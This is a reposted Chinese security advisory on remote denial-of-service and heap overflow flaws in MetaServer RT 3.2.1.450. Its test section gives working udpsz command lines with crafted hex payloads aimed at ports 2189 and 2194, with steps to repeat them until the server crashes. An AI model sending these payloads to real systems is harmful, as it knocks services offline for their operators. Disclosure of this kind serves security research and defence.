MetaServer RT多个远程拒绝服务漏洞

文章由LinuxBoy分享于2019-04-02 09:04:54热评（229）

发布日期：2011-09-21
更新日期：2011-09-21

受影响系统：
RT Soft MetaServer 3.2.1.450
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 49696

MetaServer RT是实时的数据处理和计算软件。

MetaServer RT在处理发送到TCP端口2194的恶意报文时存在拒绝服务漏洞，可被远程攻击者利用造成应用程序崩溃。

通过发送到2189、2192、2194的特制报文和不断的重复连接，可造成堆溢出。使用了"MESSA"和"ROSCO"命令。

<*来源：Luigi Auriemma （aluigi@pivx.com）

链接：http://aluigi.altervista.org/adv/metaserver_1-adv.txt
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://aluigi.org/testz/udpsz.zip

A]
udpsz -C "cdab0000 00000000 ffff0000 00000000 ffffffff 524f53434f" -l 0 -T -1 SERVER 2189 0xffff

stop after at least 50 dots and relaunch the command again till the
crashing of the server during a memcpy.

B]
udpsz -b 0x80 -T SERVER 2194 1000
udpsz -C "cdab0000 00000000 00ffffff 00000000 00000000 524f53434f" -T SERVER 2189 -1
...others...

建议：
--------------------------------------------------------------------------------
厂商补丁：

RT Soft
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.traderssoft.com/ts/msrt/

推荐文章：